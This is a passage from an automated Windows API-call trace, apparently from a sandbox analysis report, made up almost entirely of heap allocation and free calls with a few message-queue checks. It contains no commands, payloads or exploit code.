out: hHeap=0x770000) returned 1 [0044.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe68 | out: hHeap=0x770000) returned 1 [0044.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c3b8 | out: hHeap=0x770000) returned 1 [0044.067] FreeLibrary (hLibModule=0x76b40000) returned 1 [0044.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe58 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe48 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd28 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1530 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe78 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c610 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c688 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c6b8 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c628 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c478 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c418 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c460 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c4a8 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c490 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c4c0 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c4d8 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c508 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c520 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c4f0 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c538 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c3d0 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c400 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c448 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c3a0 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c3e8 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8380 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdc8 | out: hHeap=0x770000) returned 1 [0044.068] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0044.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdc8 [0044.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8380 [0044.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe78 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8380 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe78 | out: hHeap=0x770000) returned 1 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdc8 | out: hHeap=0x770000) returned 1 [0044.068] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0044.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdc8 [0044.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdc8 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c5e0 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c5b0 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe28 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c6e8 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c5f8 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe18 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15f8 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c670 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c5c8 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af358 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ba8 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c658 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe38 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe88 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afec8 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c6a0 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c6d0 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c640 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0044.069] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0044.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afec8 [0044.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe88 [0044.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0044.069] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe88 | out: hHeap=0x770000) returned 1 [0044.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0044.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7afe88 [0044.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0044.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c640 [0044.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe38 [0044.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c6d0 [0044.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe38 | out: hHeap=0x770000) returned 1 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7afe38 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c6a0 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af358 [0044.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af358 | out: hHeap=0x770000) returned 1 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af358 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c658 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe18 [0044.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe18 | out: hHeap=0x770000) returned 1 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c5c8 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ba8 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c670 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe18 [0044.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c670 | out: hHeap=0x770000) returned 1 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15f8 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c670 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c5f8 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c6e8 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe28 [0044.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c6e8 | out: hHeap=0x770000) returned 1 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1530 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c6e8 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c5b0 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afdc8 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c5e0 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe78 [0044.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe78 | out: hHeap=0x770000) returned 1 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c3e8 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe78 [0044.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c3a0 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afd28 [0044.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd28 | out: hHeap=0x770000) returned 1 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c448 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd28 [0044.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c448 | out: hHeap=0x770000) returned 1 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c448 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe48 [0044.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe48 | out: hHeap=0x770000) returned 1 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c400 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe48 [0044.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c400 | out: hHeap=0x770000) returned 1 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c400 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0044.071] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c3d0 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe58 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c538 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c4f0 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe68 [0044.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c4f0 | out: hHeap=0x770000) returned 1 [0044.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe68 | out: hHeap=0x770000) returned 1 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c4f0 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe68 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c520 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c508 [0044.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afd78 [0044.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c508 | out: hHeap=0x770000) returned 1 [0044.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd78 | out: hHeap=0x770000) returned 1 [0044.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0044.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c508 [0044.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd78 [0044.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c4d8 [0044.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c4c0 [0044.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdd8 [0044.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c4c0 | out: hHeap=0x770000) returned 1 [0044.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdd8 | out: hHeap=0x770000) returned 1 [0044.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0044.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c4c0 [0044.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afdd8 [0044.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c490 [0044.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c4a8 [0044.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0044.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c4a8 | out: hHeap=0x770000) returned 1 [0044.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdf8 | out: hHeap=0x770000) returned 1 [0044.072] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0044.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0044.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0044.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c4a8 [0044.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afde8 [0044.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x770000) returned 1 [0044.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c460 [0044.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afde8 [0044.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x770000) returned 1 [0044.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c4a8 | out: hHeap=0x770000) returned 1 [0044.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c460 | out: hHeap=0x770000) returned 1 [0044.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0044.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afde8 [0044.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0044.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0044.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x770000) returned 1 [0044.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdf8 | out: hHeap=0x770000) returned 1 [0044.073] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c460 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afde8 [0044.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x770000) returned 1 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c4a8 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afde8 [0044.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x770000) returned 1 [0044.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c460 | out: hHeap=0x770000) returned 1 [0044.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c4a8 | out: hHeap=0x770000) returned 1 [0044.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afde8 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0044.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0044.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x770000) returned 1 [0044.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdf8 | out: hHeap=0x770000) returned 1 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c4a8 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c460 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c418 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c478 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c628 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c6b8 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c688 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c610 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c3b8 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c370 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c388 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0044.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0044.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c340 [0044.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0044.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0044.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c358 [0044.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afde8 [0044.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x770000) returned 1 [0044.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c310 [0044.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afde8 [0044.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x770000) returned 1 [0044.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c358 | out: hHeap=0x770000) returned 1 [0044.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c310 | out: hHeap=0x770000) returned 1 [0044.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0044.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdf8 | out: hHeap=0x770000) returned 1 [0044.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c460 | out: hHeap=0x770000) returned 1 [0044.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c4a8 | out: hHeap=0x770000) returned 1 [0044.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c418 | out: hHeap=0x770000) returned 1 [0044.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c478 | out: hHeap=0x770000) returned 1 [0044.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c628 | out: hHeap=0x770000) returned 1 [0044.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c688 | out: hHeap=0x770000) returned 1 [0044.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c6b8 | out: hHeap=0x770000) returned 1 [0044.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c610 | out: hHeap=0x770000) returned 1 [0044.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c370 | out: hHeap=0x770000) returned 1 [0044.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c3b8 | out: hHeap=0x770000) returned 1 [0044.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c388 | out: hHeap=0x770000) returned 1 [0044.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c340 | out: hHeap=0x770000) returned 1 [0044.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0044.074] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0044.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0044.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0044.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c340 [0044.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afde8 [0044.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x770000) returned 1 [0044.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c388 [0044.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afde8 [0044.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x770000) returned 1 [0044.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c340 | out: hHeap=0x770000) returned 1 [0044.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c388 | out: hHeap=0x770000) returned 1 [0044.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0044.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afde8 [0044.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0044.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: 